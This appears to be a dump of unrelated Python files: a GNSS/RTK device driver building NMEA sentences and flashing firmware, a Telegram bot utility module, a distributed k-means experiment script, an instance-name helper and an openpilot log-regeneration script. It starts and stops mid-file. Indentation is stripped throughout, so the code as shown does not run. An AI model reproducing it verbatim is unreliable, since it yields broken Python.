gpgga = gpgga + ',' + gga_time
# latitude
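# latitude/longitude arrive as signed 32-bit integers scaled so that
# 2**31 corresponds to 180 degrees; convert to degrees and then to the
# NMEA ddmm.mmmmmmm representation below.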
latitude = float(data['latitude']) * 180 / 2147483648.0
if latitude >= 0:
latflag = 'N'
else:
latflag = 'S'
latitude = math.fabs(latitude)
lat_d = int(latitude)
lat_m = (latitude-lat_d) * 60
lat_dm = format(lat_d*100 + lat_m, '012.7f')
gpgga = gpgga + ',' + lat_dm + ',' + latflag
# longitude
longitude = float(data['longitude']) * 180 / 2147483648.0
if longitude >= 0:
lonflag = 'E'
else:
lonflag = 'W'
longitude = math.fabs(longitude)
lon_d = int(longitude)
lon_m = (longitude-lon_d) * 60
lon_dm = format(lon_d*100 + lon_m, '013.7f')
gpgga = gpgga + ',' + lon_dm + ',' + lonflag
# positionMode
gpgga = gpgga + ',' + str(data['positionMode'])
# svs
gpgga = gpgga + ',' + str(data['numberOfSVs'])
# hdop
gpgga = gpgga + ',' + format(float(data['hdop']), '03.1f')
# height
gpgga = gpgga + ',' + \
format(float(data['height']), '06.3f') + ',M'
# geoid separation (not reported, so fixed at 0.000 M)
gpgga = gpgga + ',0.000,M'
# diffage
gpgga = gpgga + ',' + \
format(float(data['diffage']), '03.1f') + ','
# checksum
checksum = 0
for i in range(1, len(gpgga)):
checksum = checksum ^ ord(gpgga[i])
str_checksum = hex(checksum)
if str_checksum.startswith("0x"):
str_checksum = str_checksum[2:]
gpgga = gpgga + '*' + str_checksum + '\r\n'
print(gpgga)
if self.ntripClient != None:
self.ntripClient.send(gpgga)
return
elif packet_type == 'pS':
try:
if data['latitude'] != 0.0 and data['longitude'] != 0.0:
if self.pS_data:
if self.pS_data['GPS_Week'] == data['GPS_Week']:
if data['GPS_TimeofWeek'] - self.pS_data['GPS_TimeofWeek'] >= 0.2:
self.add_output_packet('stream', 'pos', data)
self.pS_data = data
if data['insStatus'] >= 3 and data['insStatus'] <= 5:
ins_status = 'INS_INACTIVE'
if data['insStatus'] == 3:
ins_status = 'INS_SOLUTION_GOOD'
elif data['insStatus'] == 4:
ins_status = 'INS_SOLUTION_FREE'
elif data['insStatus'] == 5:
ins_status = 'INS_ALIGNMENT_COMPLETE'
ins_pos_type = 'INS_INVALID'
if data['insPositionType'] == 1:
ins_pos_type = 'INS_SPP'
elif data['insPositionType'] == 4:
ins_pos_type = 'INS_RTKFIXED'
elif data['insPositionType'] == 5:
ins_pos_type = 'INS_RTKFLOAT'
inspva = '#INSPVA,%s,%10.2f, %s, %s,%12.8f,%13.8f,%8.3f,%9.3f,%9.3f,%9.3f,%9.3f,%9.3f,%9.3f' %\
(data['GPS_Week'], data['GPS_TimeofWeek'], ins_status, ins_pos_type,
data['latitude'], data['longitude'], data['height'],
data['velocityNorth'], data['velocityEast'], data['velocityUp'],
data['roll'], data['pitch'], data['heading'])
print(inspva)
else:
self.add_output_packet('stream', 'pos', data)
self.pS_data = data
else:
self.add_output_packet('stream', 'pos', data)
self.pS_data = data
except Exception as e:
# print(e)
pass
elif packet_type == 'sK':
if self.sky_data:
if self.sky_data[0]['timeOfWeek'] == data[0]['timeOfWeek']:
self.sky_data.extend(data)
else:
self.add_output_packet('stream', 'skyview', self.sky_data)
self.add_output_packet('stream', 'snr', self.sky_data)
self.sky_data = []
self.sky_data.extend(data)
else:
self.sky_data.extend(data)
else:
output_packet_config = next(
(x for x in self.properties['userMessages']['outputPackets']
if x['name'] == packet_type), None)
if output_packet_config and output_packet_config.__contains__('from') \
and output_packet_config['from'] == 'imu':
self.add_output_packet('stream', 'imu', data)
def do_write_firmware(self, firmware_content):
rules = [
InternalCombineAppParseRule('rtk', 'rtk_start:', 4),
InternalCombineAppParseRule('sdk', 'sdk_start:', 4),
]
parsed_content = firmware_content_parser(firmware_content, rules)
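# The combined firmware image carries both an RTK section and an SDK
# section; the RTK part is flashed over the existing connection while the
# SDK part is written out over a dedicated UART (user port number + 3).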
user_port_num, port_name = self.build_connected_serial_port_info()
sdk_port = port_name + str(int(user_port_num) + 3)
sdk_uart = serial.Serial(sdk_port, 115200, timeout=0.1)
if not sdk_uart.isOpen():
raise Exception('Cannot open SDK upgrade port')
upgrade_center = UpgradeCenter()
upgrade_center.register(
FirmwareUpgradeWorker(self.communicator, parsed_content['rtk']))
upgrade_center.register(
SDKUpgradeWorker(sdk_uart, parsed_content['sdk']))
upgrade_center.on('progress', self.handle_upgrade_process)
upgrade_center.on('error', self.handle_upgrade_error)
upgrade_center.on('finish', self.handle_upgrade_complete)
upgrade_center.start()
def get_device_connection_info(self):
return {
'modelName': self.device_info['name'],
'deviceType': self.type,
'serialNumber': self.device_info['sn'],
'partNumber': self.device_info['pn'],
'firmware': self.device_info['firmware_version']
}
# command list
def server_status(self, *args): # pylint: disable=invalid-name
'''
Get server connection status
'''
return {
'packetType': 'ping',
'data': {'status': '1'}
}
def get_device_info(self, *args): # pylint: disable=invalid-name
'''
Get device information
'''
return {
'packetType': 'deviceInfo',
'data': [
{'name': 'Product Name', 'value': self.device_info['name']},
{'name': 'IMU', 'value': self.device_info['imu']},
{'name': 'PN', 'value': self.device_info['pn']},
{'name': 'Firmware Version',
'value': self.device_info['firmware_version']},
{'name': 'SN', 'value': self.device_info['sn']},
{'name': 'App Version', 'value': self.app_info['version']}
]
}
def get_log_info(self):
'''
Build information for log
'''
return {
"type": self.type,
"model": self.device_info['name'],
"logInfo": {
"pn": self.device_info['pn'],
"sn": self.device_info['sn'],
"rtkProperties": json.dumps(self.properties)
}
}
def get_conf(self, *args): # pylint: disable=unused-argument
'''
Get json configuration
'''
return {
'packetType': 'conf',
'data': {
'outputs': self.properties['userMessages']['outputPackets'],
'inputParams': self.properties['userConfiguration']
}
}
@with_device_message
def get_params(self, *args): # pylint: disable=unused-argument
'''
Get all parameters
'''
has_error = False
parameter_values = []
if self.app_info['app_name'] == 'INS':
conf_parameters = self.properties['userConfiguration']
conf_parameters_len = len(conf_parameters)-1
step = 10
for i in range(2, conf_parameters_len, step):
start_byte = i
end_byte = i+step-1 if i+step < conf_parameters_len else conf_parameters_len
command_line = helper.build_packet(
'gB', [start_byte, end_byte])
result = yield self._message_center.build(command=command_line, timeout=2)
if result['error']:
has_error = True
break
parameter_values.extend(result['data'])
else:
command_line = helper.build_input_packet('gA')
result = yield self._message_center.build(command=command_line, timeout=3)
if result['error']:
has_error = True
parameter_values = result['data']
if not has_error:
self.parameters = parameter_values
yield {
'packetType': 'inputParams',
'data': parameter_values
}
yield {
'packetType': 'error',
'data': 'No Response'
}
@with_device_message
def get_param(self, params, *args): # pylint: disable=unused-argument
'''
Get a single parameter value
'''
command_line = helper.build_input_packet(
'gP', properties=self.properties, param=params['paramId'])
# self.communicator.write(command_line)
# result = self.get_input_result('gP', timeout=1)
result = yield self._message_center.build(command=command_line)
if result['data']:
self.parameters = result['data']
yield {
'packetType': 'inputParam',
'data': result['data']
}
yield {
'packetType': 'error',
'data': 'No Response'
}
@with_device_message
def set_params(self, params, *args): # pylint: disable=unused-argument
'''
Update multiple parameter values
'''
input_parameters = self.properties['userConfiguration']
grouped_parameters = {}
for parameter in params:
exist_parameter = next(
(x for x in input_parameters if x['paramId'] == parameter['paramId']), None)
if exist_parameter:
has_group = grouped_parameters.__contains__(
exist_parameter['category'])
if not has_group:
grouped_parameters[exist_parameter['category']] = []
current_group = grouped_parameters[exist_parameter['category']]
current_group.append(
{'paramId': parameter['paramId'], 'value': parameter['value'], 'type': exist_parameter['type']})
for group in grouped_parameters.values():
message_bytes = []
for parameter in group:
message_bytes.extend(
encode_value('int8', parameter['paramId'])
)
message_bytes.extend(
encode_value(parameter['type'], parameter['value'])
)
# print('parameter type {0}, value {1}'.format(
# parameter['type'], parameter['value']))
# result = self.set_param(parameter)
command_line = helper.build_packet(
'uB', message_bytes)
# for s in command_line:
# print(hex(s))
result = yield self._message_center.build(command=command_line)
packet_type = result['packet_type']
data = result['data']
if packet_type == 'error':
yield {
'packetType': 'error',
'data': {
'error': data
}
}
break
if data > 0:
yield {
'packetType': 'error',
'data': {
'error': data
}
}
break
yield {
'packetType': 'success',
'data': {
'error': 0
}
}
@with_device_message
def set_param(self, params, *args): # pylint: disable=unused-argument
'''
Update a single parameter value
'''
command_line = helper.build_input_packet(
'uP', properties=self.properties, param=params['paramId'], value=params['value'])
# self.communicator.write(command_line)
# result = self.get_input_result('uP', timeout=1)
result = yield self._message_center.build(command=command_line)
error = result['error']
data = result['data']
if error:
yield {
'packetType': 'error',
'data': {
'error': data
}
}
yield {
'packetType': 'success',
'data': {
'error': data
}
}
@with_device_message
def save_config(self, *args): # pylint: disable=unused-argument
'''
Save configuration
'''
command_line = helper.build_input_packet('sC')
# self.communicator.write(command_line)
# result = self.get_input_result('sC', timeout=2)
result = yield self._message_center.build(command=command_line, timeout=2)
data = result['data']
error = result['error']
if data:
yield {
'packetType': 'success',
'data': error
}
yield {
'packetType': 'success',
'data': error
}
@with_device_message
def reset_params(self, params, *args): # pylint: disable=unused-argument
'''
Reset params to default
'''
command_line = helper.build_input_packet('rD')
result = yield self._message_center.build(command=command_line, timeout=2)
error = result['error']
data = result['data']
if error:
yield {
'packetType': 'error',
'data': {
'error': error
}
}
yield {
'packetType': 'success',
'data': data
}
def upgrade_framework(self, params, *args): # pylint: disable=unused-argument
'''
Upgrade framework
'''
file = ''
if isinstance(params, str):
file = params
if isinstance(params, dict):
file = params['file']
# start a thread to do upgrade
if not self.is_upgrading:
self.is_upgrading = True
self._message_center.pause()
if self._logger is not None:
self._logger.stop_user_log()
thread = threading.Thread(
target=self.thread_do_upgrade_framework, args=(file,))
thread.start()
print("Upgrade OpenRTK firmware started at:[{0}].".format(
datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
return {
'packetType': 'success'
}
|
util.py
|
# -*- coding: utf-8 -*-
import random
import re
import string
import threading
import traceback
import warnings
import functools
import queue as Queue
import logging
try:
from PIL import Image
from io import BytesIO
pil_imported = True
except ImportError:
pil_imported = False
logger = logging.getLogger('TeleBot')
thread_local = threading.local()
content_type_media = [
'text', 'audio', 'document', 'photo', 'sticker', 'video', 'video_note', 'voice', 'contact', 'dice', 'poll',
'venue', 'location'
]
content_type_service = [
'new_chat_members', 'left_chat_member', 'new_chat_title', 'new_chat_photo', 'delete_chat_photo', 'group_chat_created',
'supergroup_chat_created', 'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id', 'pinned_message'
]
class WorkerThread(threading.Thread):
count = 0
def __init__(self, exception_callback=None, queue=None, name=None):
if not name:
name = "WorkerThread{0}".format(self.__class__.count + 1)
self.__class__.count += 1
if not queue:
queue = Queue.Queue()
threading.Thread.__init__(self, name=name)
self.queue = queue
self.daemon = True
self.received_task_event = threading.Event()
self.done_event = threading.Event()
self.exception_event = threading.Event()
self.continue_event = threading.Event()
self.exception_callback = exception_callback
self.exception_info = None
self._running = True
self.start()
def run(self):
while self._running:
try:
task, args, kwargs = self.queue.get(block=True, timeout=.5)
self.continue_event.clear()
self.received_task_event.clear()
self.done_event.clear()
self.exception_event.clear()
logger.debug("Received task")
self.received_task_event.set()
task(*args, **kwargs)
logger.debug("Task complete")
self.done_event.set()
except Queue.Empty:
pass
except Exception as e:
logger.debug(type(e).__name__ + " occurred, args=" + str(e.args) + "\n" + traceback.format_exc())
self.exception_info = e
self.exception_event.set()
if self.exception_callback:
self.exception_callback(self, self.exception_info)
self.continue_event.wait()
def put(self, task, *args, **kwargs):
self.queue.put((task, args, kwargs))
def raise_exceptions(self):
if self.exception_event.is_set():
raise self.exception_info
def clear_exceptions(self):
self.exception_event.clear()
self.continue_event.set()
def stop(self):
self._running = False
class ThreadPool:
def __init__(self, num_threads=2):
self.tasks = Queue.Queue()
self.workers = [WorkerThread(self.on_exception, self.tasks) for _ in range(num_threads)]
self.num_threads = num_threads
self.exception_event = threading.Event()
self.exception_info = None
def put(self, func, *args, **kwargs):
self.tasks.put((func, args, kwargs))
def on_exception(self, worker_thread, exc_info):
self.exception_info = exc_info
self.exception_event.set()
worker_thread.continue_event.set()
def raise_exceptions(self):
if self.exception_event.is_set():
raise self.exception_info
def clear_exceptions(self):
self.exception_event.clear()
def close(self):
for worker in self.workers:
worker.stop()
for worker in self.workers:
worker.join()
class AsyncTask:
def __init__(self, target, *args, **kwargs):
self.target = target
self.args = args
self.kwargs = kwargs
self.done = False
self.thread = threading.Thread(target=self._run)
self.thread.start()
def _run(self):
try:
self.result = self.target(*self.args, **self.kwargs)
except Exception as e:
self.result = e
self.done = True
def wait(self):
if not self.done:
self.thread.join()
if isinstance(self.result, BaseException):
raise self.result
else:
return self.result
def async_dec():
def decorator(fn):
def wrapper(*args, **kwargs):
return AsyncTask(fn, *args, **kwargs)
return wrapper
return decorator
def is_string(var):
return isinstance(var, str)
def is_dict(var):
return isinstance(var, dict)
def is_bytes(var):
return isinstance(var, bytes)
def is_pil_image(var):
return pil_imported and isinstance(var, Image.Image)
def pil_image_to_file(image, extension='JPEG', quality='web_low'):
if pil_imported:
photoBuffer = BytesIO()
image.convert('RGB').save(photoBuffer, extension, quality=quality)
photoBuffer.seek(0)
return photoBuffer
else:
raise RuntimeError('PIL module is not imported')
def is_command(text):
"""
Checks if `text` is a command. Telegram chat commands start with the '/' character.
:param text: Text to check.
:return: True if `text` is a command, else False.
"""
if (text is None): return None
return text.startswith('/')
def extract_command(text):
"""
Extracts the command from `text` (minus the '/') if `text` is a command (see is_command).
If `text` is not a command, this function returns None.
Examples:
extract_command('/help'): 'help'
extract_command('/help@BotName'): 'help'
extract_command('/search black eyed peas'): 'search'
extract_command('Good day to you'): None
:param text: String to extract the command from
:return: the command if `text` is a command (according to is_command), else None.
"""
if (text is None): return None
return text.split()[0].split('@')[0][1:] if is_command(text) else None
def split_string(text, chars_per_string):
"""
Splits one string into multiple strings, with a maximum amount of `chars_per_string` characters per string.
This is very useful for splitting one giant message into multiples.
:param text: The text to split
:param chars_per_string: The number of characters per line the text is split into.
:return: The split text as a list of strings.
"""
return [text[i:i + chars_per_string] for i in range(0, len(text), chars_per_string)]
# CREDITS TO http://stackoverflow.com/questions/12317940#answer-12320352
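# or_set/or_clear/orify monkey-patch an Event so that a callback fires on
# every state change; OrEvent combines several Events into one that is set
# whenever any of the underlying events is set.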
def or_set(self):
self._set()
self.changed()
def or_clear(self):
self._clear()
self.changed()
def orify(e, changed_callback):
if not hasattr(e, "_set"):
e._set = e.set
if not hasattr(e, "_clear"):
e._clear = e.clear
e.changed = changed_callback
e.set = lambda: or_set(e)
e.clear = lambda: or_clear(e)
def OrEvent(*events):
or_event = threading.Event()
def changed():
bools = [ev.is_set() for ev in events]
if any(bools):
or_event.set()
else:
or_event.clear()
def busy_wait():
while not or_event.is_set():
or_event._wait(3)
for e in events:
orify(e, changed)
or_event._wait = or_event.wait
or_event.wait = busy_wait
changed()
return or_event
def extract_arguments(text):
"""
Returns the argument after the command.
Examples:
extract_arguments("/get name"): 'name'
extract_arguments("/get"): ''
extract_arguments("/get@botName name"): 'name'
:param text: String to extract the command arguments from
:return: the arguments if `text` is a command (according to is_command), else None.
"""
regexp = re.compile(r"/\w*(@\w*)*\s*([\s\S]*)",re.IGNORECASE)
result = regexp.match(text)
return result.group(2) if is_command(text) else None
def per_thread(key, construct_value, reset=False):
if reset or not hasattr(thread_local, key):
value = construct_value()
setattr(thread_local, key, value)
return getattr(thread_local, key)
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
# https://stackoverflow.com/a/312464/9935473
for i in range(0, len(lst), n):
yield lst[i:i + n]
def generate_random_token():
return ''.join(random.sample(string.ascii_letters, 16))
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used."""
# https://stackoverflow.com/a/30253848/441814
@functools.wraps(func)
def new_func(*args, **kwargs):
warnings.simplefilter('always', DeprecationWarning) # turn off filter
warnings.warn("Call to deprecated function {}.".format(func.__name__),
category=DeprecationWarning,
stacklevel=2)
warnings.simplefilter('default', DeprecationWarning) # reset filter
return func(*args, **kwargs)
return new_func
|
experiments_mp.py
|
# -*- coding: utf-8 -*-
"""
This module was created for testing initial benchmarks of the various
clustering approaches.
"""
import numpy as np
import os
from sklearn import metrics
from time import time
from dkmeans.data import get_dataset
from dkmeans.data import DEFAULT_DATASET, DEFAULT_THETA, DEFAULT_WINDOW
from dkmeans.data import DEFAULT_M, DEFAULT_N
from dkmeans.data import choose_best_centroids
from dkmeans.metrics import average_distance
import dkmeans.singleshot as dkss
import dkmeans.multishot as dkms
import dkmeans.kmeans_pooled as kp
from multiprocessing import Process, Queue
METHODS = {
'pooled': (kp.main, {}),
#'singleshot_lloyd': (dkss.main, {'optimization': 'lloyd'}),
#'singleshot_gradient': (dkss.main, {'optimization': 'gradient'}),
#'multishot_lloyd': (dkms.main, {'optimization': 'lloyd'}),
#'multishot_gradient': (dkms.main, {'optimization': 'gradient'}),
} # STORES the method mains and the kwarg for the corresponding opt
METHOD_NAMES = METHODS.keys()
METRICS = { 'silhouette': metrics.silhouette_score,
#'avg_dist': average_distance,
}
METRIC_NAMES = METRICS.keys()
DEFAULT_METHOD = "pooled"
DEFAULT_VERBOSE = True
def evaluate_metric(X, labels, metric):
"""
More helpful for when we have different choices of metrics
"""
flat_X = [x.flatten() for x in X]
try:
return METRICS[metric](flat_X, np.array(labels))
except ValueError: # TODO - fix this...
if len(set(labels)) == 1:
print(labels)
print("Bad Clustering - all labels assigned to one cluster")
return -1
def run_method(X, k, method=DEFAULT_METHOD, subjects=None, **kwargs):
"""
Run a given method by name
"""
# print("Running Method %s" % method)
start = time()
if 'init_centroids' in kwargs.keys() and type(
kwargs['init_centroids']) is dict:
kwargs['init_centroids'] = kwargs['init_centroids'][method]
res = METHODS[method][0](X, k, **METHODS[method][1], **kwargs)
# print(res)
end = time()
res['rtime'] = end - start
res['subjects'] = subjects
return res
def run_experiment(k, N, dataset=DEFAULT_DATASET, theta=DEFAULT_THETA,
dfnc_window=DEFAULT_WINDOW, m=DEFAULT_M, n=DEFAULT_N,
metrics=METRIC_NAMES,
methods=METHOD_NAMES, **kwargs):
"""
Run an experiment with a particular choice of
1. Data set
2. Data Parameters k, n, theta, dfnc_window, m, n
3. metric
4. method
5. Method parameters passed in kwargs
"""
subjects = None
X, subjects = get_dataset(N, dataset=dataset, theta=theta,
dfnc_window=dfnc_window, m=m, n=n)
res = {method: run_method(X, k, subjects=subjects, method=method, **kwargs)
for method in methods}
measures = {res[r]['name']: {metric: evaluate_metric(res[r]['X'],
res[r]['cluster_labels'], metric)
for metric in metrics} for r in res}
return measures, res
def run_repeated_experiment_mp(R, k, N, metrics=METRIC_NAMES,
methods=METHOD_NAMES, **kwargs):
"""
Run repeated experiments in parallel, spawning one worker process per
repetition and collecting the results through per-process queues.
"""
measures = {method: {metric: [] for metric in metrics}
for method in methods}
results = {method: [] for method in methods}
processes = []
queues = []
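# Launch one worker process per repetition; each process pushes its
# (measures, results) pair back through its own Queue before being joined.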
for r in range(R):
q = Queue()
p = Process(target=one_run_exp, args=(q, k, N, metrics,
methods, ), kwargs=kwargs)
p.start()
processes.append(p)
queues.append(q)
for i, pq in enumerate(zip(processes, queues)):
p, q = pq
meas, res = q.get()
p.join()
for method in methods:
results[method] += [res[method]]
for metric in metrics:
measures[method][metric] += [meas[method][metric]]
return measures, results
def run_repeated_experiment(R, k, N, metrics=METRIC_NAMES,
methods=METHOD_NAMES, **kwargs):
"""
Run repeated experiments sequentially in the current process.
"""
measures = {method: {metric: [] for metric in metrics}
for method in methods}
results = {method: [] for method in methods}
for r in range(R):
meas, res = one_run_exp(None, k, N, metrics, methods, **kwargs)
print("Printing Results k=%d, R=%d, N=%d in process %s" %
(k, R, N, os.getpid()))
for method in meas:
for measure in meas[method]:
print('\t%s, %s: %s' % (method, measure,
np.max(meas[method][measure])))
for method in methods:
results[method] += [res[method]]
for metric in metrics:
measures[method][metric] += [meas[method][metric]]
return measures, results
def one_run_exp(q, k, N, metrics, methods, **kwargs):
np.random.seed(seed=os.getpid())
meas, res = run_experiment(k, N, metrics=metrics, methods=methods,
**kwargs)
if q is not None:
q.put([meas, res])
return meas, res
# print("Done with experiment k=%d, N=%d in process %s" %
# (k, N, os.getpid()))
def dfnc_pipe(k, N, R, s=2, rep=100):
print("Running dFNC exemplars k=%d, R=%d, N=%d, s=%d in process %s" %
(k, rep, N, s, os.getpid()))
meas, res = run_repeated_experiment_mp(rep, k, N,
dataset='real_fmri_exemplar',
s=s,
verbose=True)
for method in meas:
print("saving exemplars")
np.save('results/exemplar_N%d_s%d_k%d_%s_meas.npy' %
(N, s, k, method), meas)
np.save('results/exemplar_N%d_s%d_k%d_%s_res.npy' %
(N, s, k, method), res)
print("Printing Exemplar Results k=%d, R=%d, N=%d in process %s" %
(k, rep, N, os.getpid()))
for method in meas:
for measure in meas[method]:
print('\t%s, %s: %s' % (method, measure,
np.max(meas[method][measure])))
for method in meas:
exemplars = choose_best_centroids('results/exemplar_N%d_s%d_k%d_%s_res.npy'
% (N, s, k, method),
'results/exemplar_N%d_s%d_k%d_%s_meas.npy'
% (N, s, k, method),
list(meas.keys()))
print("Running dFNC second stage k=%d, R=%d, N=%d in process %s" %
(k, R, N, os.getpid()))
measR, resR = run_repeated_experiment_mp(1, k, N,
dataset='real_fmri',
verbose=True,
s=s,
init_centroids=exemplars)
print("Saving measure results")
np.save('results/fbirn_N%d_s%d_k%d_%s_meas.npy' %
(N, s, k, method), measR)
print("Saving results")
np.save('results/fbirn_N%d_s%d_k%d_%s_res.npy' %
(N, s, k, method), resR)
print("Printing Second Stage Results k=%d, R=%d, N=%d in process %s" %
(k, R, N, os.getpid()))
for method in measR:
for measure in measR[method]:
print('\t%s, %s: %s' % (method, measure,
np.max(measR[method][measure])))
def main():
"""Run a suite of experiments in order"""
# datar = [ # 'gaussian',
# 'iris',
# 'simulated_fmri',
# 'real_fmri_exemplar'
# ] # datasets to run
R = 5 # Number of repetitions
N = 314 # Number of samples
# Oth experiment is gaussian set with known number of clusters, 3,
'''
print("Running known K experiment")
theta = [[-1, 0.5], [1, 0.5], [2.5, 0.5]]
meas, res = run_repeated_experiment(R, 3, N, theta=theta, verbose=True,
dataset='gaussian')
np.save('repeat_known_k_meas.npy', meas)
np.save('repeat_known_k_res.npy', res)
'''
# First experiment is increasing k
# measure the scores and iterations, no runtimes
'''
print("Running increasing K experiment")
k_test = range(4, 5)
for k in k_test:
for d in datar:
print("K: %d; Dataset %s" % (k, d))
meas, res = run_repeated_experiment(R, k, N,
dataset=d, verbose=False)
np.save('results/d%s_k%d_meas.npy' % (d, k), meas)
np.save('results/d%s_k%d_res.npy' % (d, k), res)
'''
# Second experiment is increasing N with fixed k
# Measure the number of iterations and the runtime and the scores
# TODO: Implement this
# Third experiment is Increasing number of subjects in simulated
# Real fMRI data
# TODO: Implement this
# Experiment with 300 subjects, 30 sites
print("Running K experiment dFNC pipeline")
s = 2
#processes = []
dfnc_pipe(5, N, R, s)
# for k in k_test:
# p = Process(target=dfnc_pipe, args=(k, N, R, s))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
if __name__ == '__main__':
# TODO Arg-Parsing
main()
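# A minimal argparse sketch for the TODO above (flag names are assumptions,
# not part of the original script):
#   parser = argparse.ArgumentParser(description="dFNC clustering experiments")
#   parser.add_argument("-k", type=int, default=5, help="number of clusters")
#   parser.add_argument("-N", type=int, default=314, help="number of samples")
#   parser.add_argument("-R", type=int, default=5, help="number of repetitions")
#   parser.add_argument("-s", type=int, default=2, help="value forwarded to dfnc_pipe")
#   args = parser.parse_args()
#   dfnc_pipe(args.k, args.N, args.R, args.s)
# (argparse would also need to be imported at the top of the file.)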
|
_instanceinfo.py
|
# -*- coding: utf-8 -*-
"""
INSTANCE INFO:
-----------------
This module is a copy of the code created by TheoRet at StackOverflow
TheoRet profile:
https://stackoverflow.com/users/7386061/theoret
Link to the question/answer:
https://stackoverflow.com/questions/1690400/getting-an-instance-name-inside-class-init/49331683#49331683
"""
import time
import traceback
import threading
class InstanceCreationError(Exception):
pass
class RememberInstanceCreationInfo:
def __init__(self):
for frame, _ in traceback.walk_stack(None):
varnames = frame.f_code.co_varnames
            if not varnames:
break
if frame.f_locals[varnames[0]] not in (self, self.__class__):
break
# if the frame is inside a method of this instance,
# the first argument usually contains either the instance or
# its class
# we want to find the first frame, where this is not the case
else:
raise InstanceCreationError("No suitable outer frame found.")
self._outer_frame = frame
self.creation_module = frame.f_globals["__name__"]
self.creation_file, self.creation_line, self.creation_function, \
self.creation_text = \
traceback.extract_stack(frame, 1)[0]
self.creation_name = self.creation_text.split("=")[0].strip()
super().__init__()
# threading.Thread(target=self._check_existence_after_creation).start()
def _check_existence_after_creation(self):
while self._outer_frame.f_lineno == self.creation_line:
time.sleep(0.01)
# this is executed as soon as the line number changes
# now we can be sure the instance was actually created
error = InstanceCreationError(
"\nCreation name not found in creation frame.\ncreation_file: "
"%s \ncreation_line: %s \ncreation_text: %s\ncreation_name ("
"might be wrong): %s" % (
self.creation_file, self.creation_line, self.creation_text,
self.creation_name))
nameparts = self.creation_name.split(".")
try:
var = self._outer_frame.f_locals[nameparts[0]]
except KeyError:
raise error
finally:
del self._outer_frame
# make sure we have no permanent inter frame reference
# which could hinder garbage collection
try:
for name in nameparts[1:]:
var = getattr(var, name)
except AttributeError:
raise error
if var is not self:
raise error
def __repr__(self):
return super().__repr__()[
:-1] + " with creation_name '%s'>" % self.creation_name
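# --- Minimal usage sketch (added for illustration; not part of the original
# StackOverflow answer). Run this file directly to try it out.
class _DemoWidget(RememberInstanceCreationInfo):
    pass
if __name__ == "__main__":
    my_widget = _DemoWidget()
    # creation_name is inferred from the assignment target on the creating line
    print(my_widget.creation_name)  # expected output: my_widget
    print(my_widget)  # repr ends with "with creation_name 'my_widget'"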
|
regen.py
|
#!/usr/bin/env python3
import os
import time
import multiprocessing
from tqdm import tqdm
import argparse
# run DM procs
os.environ["USE_WEBCAM"] = "1"
import cereal.messaging as messaging
from cereal.services import service_list
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common.params import Params
from common.realtime import Ratekeeper, DT_MDL, DT_DMON
from common.transformations.camera import eon_f_frame_size, eon_d_frame_size
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.manager.process import ensure_running
from selfdrive.manager.process_config import managed_processes
from selfdrive.test.update_ci_routes import upload_route
from tools.lib.route import Route
from tools.lib.framereader import FrameReader
from tools.lib.logreader import LogReader
process_replay_dir = os.path.dirname(os.path.abspath(__file__))
FAKEDATA = os.path.join(process_replay_dir, "fakedata/")
def replay_service(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() == s]
while True:
for m in smsgs:
# TODO: use logMonoTime
pm.send(s, m.as_builder())
rk.keep_time()
vs = None
def replay_cameras(lr, frs):
cameras = [
("roadCameraState", DT_MDL, eon_f_frame_size, VisionStreamType.VISION_STREAM_YUV_BACK),
("driverCameraState", DT_DMON, eon_d_frame_size, VisionStreamType.VISION_STREAM_YUV_FRONT),
]
def replay_camera(s, stream, dt, vipc_server, fr, size):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(1 / dt, print_delay_threshold=None)
img = b"\x00" * int(size[0]*size[1]*3/2)
while True:
if fr is not None:
img = fr.get(rk.frame % fr.frame_count, pix_fmt='yuv420p')[0]
img = img.flatten().tobytes()
rk.keep_time()
m = messaging.new_message(s)
msg = getattr(m, s)
msg.frameId = rk.frame
pm.send(s, m)
vipc_server.send(stream, img, msg.frameId, msg.timestampSof, msg.timestampEof)
# init vipc server and cameras
p = []
global vs
vs = VisionIpcServer("camerad")
for (s, dt, size, stream) in cameras:
fr = frs.get(s, None)
vs.create_buffers(stream, 40, False, size[0], size[1])
p.append(multiprocessing.Process(target=replay_camera,
args=(s, stream, dt, vs, fr, size)))
# hack to make UI work
vs.create_buffers(VisionStreamType.VISION_STREAM_RGB_BACK, 4, True, eon_f_frame_size[0], eon_f_frame_size[1])
vs.start_listener()
return p
def regen_segment(lr, frs=None, outdir=FAKEDATA):
lr = list(lr)
if frs is None:
frs = dict()
# setup env
params = Params()
params.clear_all()
params.put_bool("Passive", False)
params.put_bool("OpenpilotEnabledToggle", True)
  params.put_bool("CommunityFeaturesToggle", True)
cal = messaging.new_message('liveCalibration')
cal.liveCalibration.validBlocks = 20
cal.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
params.put("CalibrationParams", cal.to_bytes())
os.environ["LOG_ROOT"] = outdir
os.environ["SIMULATION"] = "1"
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = msg.carParams.carFingerprint
if len(msg.carParams.carFw) and (car_fingerprint in FW_VERSIONS):
params.put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
#TODO: init car, make sure starts engaged when segment is engaged
fake_daemons = {
'sensord': [
multiprocessing.Process(target=replay_service, args=('sensorEvents', lr)),
],
'pandad': [
multiprocessing.Process(target=replay_service, args=('can', lr)),
multiprocessing.Process(target=replay_service, args=('pandaState', lr)),
],
#'managerState': [
# multiprocessing.Process(target=replay_service, args=('managerState', lr)),
#],
'thermald': [
multiprocessing.Process(target=replay_service, args=('deviceState', lr)),
],
'camerad': [
*replay_cameras(lr, frs),
],
# TODO: fix these and run them
'paramsd': [
multiprocessing.Process(target=replay_service, args=('liveParameters', lr)),
],
'locationd': [
multiprocessing.Process(target=replay_service, args=('liveLocationKalman', lr)),
],
}
try:
# start procs up
